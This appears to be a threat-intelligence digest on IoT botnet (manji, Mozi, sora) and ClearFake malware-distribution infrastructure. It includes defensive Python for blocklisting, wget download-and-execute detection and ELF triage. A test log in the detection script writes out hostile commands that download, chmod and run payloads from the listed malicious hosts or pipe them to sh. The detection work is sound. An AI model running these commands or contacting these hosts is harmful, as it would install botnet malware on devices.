On April 15, 2026, malicious infrastructure activity remained elevated with 50 malware distribution URLs identified across URLhaus feeds. The threat landscape is dominated by IoT-focused botnet campaigns, particularly Mozi botnet variants and the emerging 'manji' malware family targeting Linux-based embedded devices. Multiple IP addresses are actively serving multi-architecture payloads designed for cross-platform IoT exploitation. Additionally, ClearFake/NetSupport campaign infrastructure continues operating through compromised domains, leveraging social engineering to distribute remote access tools. The concentration of wget-based delivery mechanisms indicates automated exploitation of known IoT vulnerabilities remains a primary attack vector.
The manji malware family is distributed as payloads compiled for x86, ARM, MIPS, SPARC, and PowerPC, indicating that the operators are casting a wide net across diverse IoT ecosystems. Infrastructure at 188.214.30.136 serves payloads from several HTTP listeners on ports 3775-3779, consistent with dedicated, purpose-built distribution infrastructure; the URL data alone does not establish a malware-as-a-service operation. The continued Mozi botnet activity, despite previous disruption efforts, shows that IoT threats persist and require stronger network segmentation and firmware update strategies.
Security teams should prioritize blocking the identified malicious infrastructure, implementing network-level detection for wget download-and-execute patterns, and reviewing which IoT devices are reachable from the internet or from untrusted network segments. The diversity of targeted architectures underscores the importance of a comprehensive asset inventory and patch management across all connected devices, particularly those in industrial and enterprise environments.
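The following Python script is an added example, not part of the URLhaus summary above, of the blocking and detection recommended in this report: it builds a host blocklist from the IPs and domains named in this digest and flags command-line or shell-audit records that fetch a payload with wget and then execute it. The log lines are constructed (203.0.113.7 is a documentation address), and the per-architecture filename heuristic and the "non-standard port" rule are the author's assumptions, not feed data; Mozi-style one-letter names such as Mozi.m are caught only by the host rule.

```python
import re
from urllib.parse import urlparse

# Hosts named in this report; an analyst would refresh this set from the feed.
BLOCKED_HOSTS = {
    "188.214.30.136", "182.119.62.86", "176.65.148.189", "157.245.158.45",
    "152.42.183.1", "91.218.66.241", "103.186.147.155",
    "maro033.identifypls.us.com", "gate6-way.bri7tanon.in.net",
}
BLOCKED_PREFIXES = ("223.123.43.",)  # the Mozi 223.123.43.x range named above

# Per-architecture payload names used by multi-arch IoT droppers (assumed heuristic,
# modelled on names such as manji.arm7 or sora.mips64; one-letter Mozi names are missed).
ARCH_TOKEN = re.compile(
    r"(?:^|[._-])(?:x86(?:_64)?|i[3-6]86|arm(?:v?[4-7])?l?|mips(?:el|64)?|mpsl|"
    r"sparc|spc|ppc|powerpc|arc|sh4|m68k)(?:$|[._-])", re.I)
# First URL argument of a wget invocation.
WGET_URL = re.compile(r"\bwget\s[^;|&]*?(https?://[^\s;'\"|&]+)", re.I)
# chmod target, stopped at a command separator so "chmod +x bin; ./bin" parses correctly.
CHMOD = re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})\s+([^\s;&|]+)")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|a)?sh\b")


def _executes_after_chmod(cmd):
    """True if the file made executable by chmod is invoked later in the same command line."""
    m = CHMOD.search(cmd)
    if not m:
        return False
    target = m.group(1).rsplit("/", 1)[-1]
    rest = cmd[m.end():]
    # invoked as ./name, /some/path/name or bare name after a separator
    return re.search(r"[;&|]\s*(?:\./|/[\w./-]*/)?" + re.escape(target) + r"\b", rest) is not None


def analyze_command(cmd):
    """Classify one command-line record; None if no wget fetch or nothing about it looks bad."""
    m = WGET_URL.search(cmd)
    if not m:
        return None
    url = m.group(1)
    u = urlparse(url)
    host = (u.hostname or "").lower()
    reasons = []
    if host in BLOCKED_HOSTS or host.startswith(BLOCKED_PREFIXES):
        reasons.append("known_bad_host")
    if u.port is not None and u.port not in (80, 443):
        reasons.append("nonstandard_port")
    if ARCH_TOKEN.search(u.path.rsplit("/", 1)[-1]):
        reasons.append("arch_named_payload")
    if _executes_after_chmod(cmd):
        reasons.append("chmod_exec_chain")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipe_to_shell")
    if not reasons:
        return None
    return {"url": url, "host": host, "port": u.port, "reasons": reasons}


def scan(lines):
    """Return [(line_index, verdict)] for every flagged record."""
    hits = []
    for i, line in enumerate(lines):
        verdict = analyze_command(line)
        if verdict:
            hits.append((i, verdict))
    return hits


# Constructed records in the style of a shell audit log; not taken from the feed.
SAMPLE_LOG = [
    "cd /tmp; wget http://188.214.30.136:3776/manji.mips; chmod +x manji.mips; ./manji.mips",
    "wget http://maro033.identifypls.us.com/bins/x86 -O /tmp/x; chmod 777 /tmp/x; /tmp/x",
    "busybox wget http://203.0.113.7:9999/arm7 -O- | sh",
    "wget http://223.123.43.10:56281/Mozi.m; chmod 777 Mozi.m; ./Mozi.m",
    "wget https://deb.debian.org/debian/pool/main/c/curl/curl_8.5.0.orig.tar.gz",
    "curl -fsSL https://example.com/install.sh | sh",
]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE_LOG):
        print("line %d: %s -> %s" % (idx, verdict["url"], ", ".join(verdict["reasons"])))
```

The third record is flagged on behaviour alone (unusual port, architecture-named file, pipe to a shell) even though its host is not on the list, which is the point of pairing indicator matching with pattern detection; the last record shows the obvious gap, since curl, tftp and ftpget fetches need the same treatment.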
Active malware distribution targeting diverse IoT device architectures through wget-based delivery mechanisms
Infrastructure at 188.214.30.136 distributing manji malware from ports 3775-3779, with payloads for x86, ARM, MIPS, SPARC, and PowerPC. The multiple per-architecture payloads indicate broad IoT device targeting, including routers, cameras, and embedded systems.
Active Mozi botnet distribution observed from multiple IP addresses geolocated to China (the 223.123.43.x range and 182.119.62.86). Mozi continues targeting IoT devices despite previous disruption efforts, serving payloads from multiple high-numbered ports.
Domain maro033.identifypls.us.com actively serving manji malware variants for multiple architectures. The hostname sits under the third-party shared domain us.com, which can slip past reputation blocking that operates at the registered-domain level rather than on the full hostname.
Active ClearFake campaign distributing NetSupport RAT through the domain gate6-way.bri7tanon.in.net (compromised or attacker-registered). Uses a fake browser-update lure to trick users into downloading and running the remote access tool.
Infrastructure at 176.65.148.189 distributing 'sora' malware variants for ARM, SPARC, and MIPS64 from a directory path named HideChaotic, a deliberately staged hosting location that points to organized distribution.
Multiple IP addresses (157.245.158.45, 152.42.183.1, 91.218.66.241, 103.186.147.155) serving generic download scripts and architecture-specific binaries, including the 'nullpointer' malware family. The spread of hosting across unrelated addresses suggests botnet recruitment operations.
Threat actors leveraging automated exploitation and cross-architecture compilation for maximum IoT device compromise
All 50 malware distribution URLs are fetched with wget, the pattern expected when a payload is pulled by a command injected into a vulnerable device or by a stage run after credential compromise. Attack chains are likely automated by scanners that identify vulnerable devices and push the download command.
Compiling malware for 10+ architectures (x86, x86_64, ARM v4/5/6/7, MIPS, SPARC, PowerPC, ARC, SH4) ensures compatibility with the largest possible population of IoT devices, and indicates a mature build infrastructure aimed at diverse device ecosystems.
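When a dropper pulls a dozen differently named binaries, the quickest way to confirm which architectures it actually covers is to read the ELF header of each file rather than trust the filename. The script below is an added example, not code from this report or from any of the named malware families: it parses the ELF identification bytes, e_machine and e_type with the standard library, and groups payloads by machine, word size and byte order. The sample files are constructed minimal headers built by a helper in the script (no real malware is embedded); the e_machine constants are from the ELF specification. One caveat relevant to the ARM v4/5/6/7 builds above: the header identifies ARM only, because the sub-architecture lives in the .ARM.attributes section, not in the header.

```python
import struct

# e_machine values from the ELF specification / Linux elf.h.
EM_NAMES = {
    2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 18: "SPARC32+", 20: "PowerPC",
    21: "PowerPC64", 40: "ARM", 42: "SuperH", 43: "SPARCv9", 45: "ARC",
    62: "x86_64", 93: "ARC", 183: "AArch64", 195: "ARC", 243: "RISC-V",
}
ET_NAMES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def identify_elf(data):
    """Read class, byte order, machine and type from an ELF header; None if not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    bits = 32 if ei_class == 1 else 64
    if len(data) < (52 if bits == 32 else 64):   # full header size per class
        return None
    prefix = "<" if ei_data == 1 else ">"        # EI_DATA sets the byte order of every later field
    e_type, e_machine = struct.unpack(prefix + "HH", data[16:20])
    flags_off = 36 if bits == 32 else 48         # e_flags follows e_entry/e_phoff/e_shoff (4 or 8 bytes each)
    (e_flags,) = struct.unpack(prefix + "I", data[flags_off:flags_off + 4])
    info = {
        "bits": bits,
        "endian": "little" if ei_data == 1 else "big",
        "machine": EM_NAMES.get(e_machine, "unknown(%d)" % e_machine),
        "type": ET_NAMES.get(e_type, str(e_type)),   # static bot binaries are normally EXEC
    }
    if e_machine == 40:
        info["arm_eabi_version"] = e_flags >> 24  # EF_ARM_EABIMASK: top byte holds the EABI version
    return info


def triage(samples):
    """Group payloads by machine/bits/endian; returns (coverage dict, names that are not ELF)."""
    coverage, skipped = {}, []
    for name, data in samples.items():
        info = identify_elf(data)
        if info is None:
            skipped.append(name)
            continue
        label = "%s/%d/%s" % (info["machine"], info["bits"], info["endian"])
        coverage.setdefault(label, []).append(name)
    return coverage, skipped


def build_elf_header(bits, big_endian, e_machine, e_type=2, e_flags=0):
    """Construct a minimal, valid ELF header for testing (not taken from any real sample)."""
    prefix = ">" if big_endian else "<"
    ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 2 if big_endian else 1, 1, 0, 0]) + b"\x00" * 7
    if bits == 64:
        rest = struct.pack(prefix + "HHIQQQIHHHHHH",
                           e_type, e_machine, 1, 0x400000, 64, 0, e_flags, 64, 56, 0, 64, 0, 0)
    else:
        rest = struct.pack(prefix + "HHIIIIIHHHHHH",
                           e_type, e_machine, 1, 0x8048000, 52, 0, e_flags, 52, 32, 0, 40, 0, 0)
    return ident + rest


# Constructed stand-ins for a dropper's per-architecture payloads (names modelled on those above).
SAMPLES = {
    "manji.x86": build_elf_header(32, False, 3),
    "manji.x86_64": build_elf_header(64, False, 62),
    "manji.arm7": build_elf_header(32, False, 40, e_flags=0x05000000),
    "manji.mips": build_elf_header(32, True, 8),
    "manji.mpsl": build_elf_header(32, False, 8),
    "sora.mips64": build_elf_header(64, True, 8),
    "manji.spc": build_elf_header(32, True, 2),
    "manji.ppc": build_elf_header(32, True, 20),
    "manji.sh4": build_elf_header(32, False, 42),
    "manji.arc": build_elf_header(32, False, 93),
    "readme.txt": b"not an ELF payload",
}

if __name__ == "__main__":
    coverage, skipped = triage(SAMPLES)
    for label in sorted(coverage):
        print("%-20s %s" % (label, ", ".join(coverage[label])))
    print("not ELF:", skipped)
```

MIPS shows up three times in the grouping (32-bit big-endian, 32-bit little-endian, 64-bit big-endian) because e_machine alone does not distinguish them; the class and EI_DATA bytes do, which is why the triage key includes all three fields.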
Industry analysis on IOC enrichment alternatives for security operations
Analysis of cost-effective alternatives to the VirusTotal API for multi-source indicator-of-compromise enrichment. Relevant for teams building threat intelligence pipelines under API cost constraints.